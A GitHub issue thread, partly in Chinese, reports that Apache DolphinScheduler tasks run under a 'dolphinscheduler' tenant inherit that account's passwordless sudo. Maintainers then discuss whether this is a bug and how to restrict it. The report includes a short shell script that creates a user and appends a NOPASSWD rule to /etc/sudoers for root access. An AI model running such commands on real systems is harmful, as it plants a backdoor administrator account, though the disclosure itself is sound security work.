### ISSUE TITLE
通过dolphinescheduler获取主机的root权限

### ISSUE THREAD

**Issue by zqWu** [apache/incubator-dolphinscheduler#3998]
不知道这个是否属于bug。

(1) dolphinschduler安装的机器上有 linux账号 dolphinscheduler，这个账号是sudoer，且免密
(2) 任务执行时，当前用户是安全中心下的某个租户，当这个租户=dolphinscheduler时，就可以执行几乎所有操作

重现bug:
(1) 安全中心，建租户 dolphinscheduler
(2) 工作流，shell 脚本
`
#!/bin/bash

ip addr | grep 'inet ' # 当前主机ip
whoami                    # i am dolphinscheduler
sudo useradd dormi
echo "dormi" | sudo passwd --stdin dormi

sudo chmod 660 /etc/sudoers
sudo sed -i '$adormi  ALL=(ALL)  NOPASSWD: NOPASSWD: ALL' /etc/sudoers
sudo chmod 440 /etc/sudoers
`
然后选择租户  dolphinscheduler作为执行租户。

如果运行没问题，就可以在该主机上有 dormi账户了。
sudo -i就是root

**Comment by zhuangchong** [comment]
I think this is not a bug

There is a linux account dolphinscheduler on the machine where dolphinschduler is installed. This account is sudoer and is not secret-free. Dolphinschduler can already execute all root permissions.

If you think the permissions of the dolphinscheduler tenant are too large, there are several implementation options
1. Dolphinscheduler tenants only manage users, perform tenants that do not perform specific tasks
2. Linux sudo can set only user list, so dolphinschedule users can only access the user list you added with sudo, without root authority.

---
我认为这不是一个bug
dolphinschduler安装的机器上有 linux账号 dolphinscheduler，这个账号是sudoer，且免密，dolphinscheduler已经可以执行root的所有权限。

如果你认为dolphinscheduler租户的权限太大，可以有几种实现方案
1.dolphinscheduler租户只是管理用户，不做具体任务的执行租户
2.linux sudo 可以设置只用户列表，这样dolphinschedule用户只能sudo访问你添加的用户列表，没有root的权限。

**Comment by zhuangchong** [comment]
please first English, then you can append description in Chinese.

**Comment by gabrywu** [comment]
@zhuangchong I think we should add the limitation that DophiinScheduler can't create a tenant named as dolphinschedule

**Comment by zhuangchong** [comment]
> @zhuangchong I think we should add the limitation that DophiinScheduler can't create a tenant named as dolphinschedule

I don't think dolphin scheduler should have the right to create users. This permission is relatively large.

---
我认为dolphinscheduler不应该有去创建用户的权限，这个权限比较大.

**Comment by CalvinKirs** [comment]
For related issues, see #4069
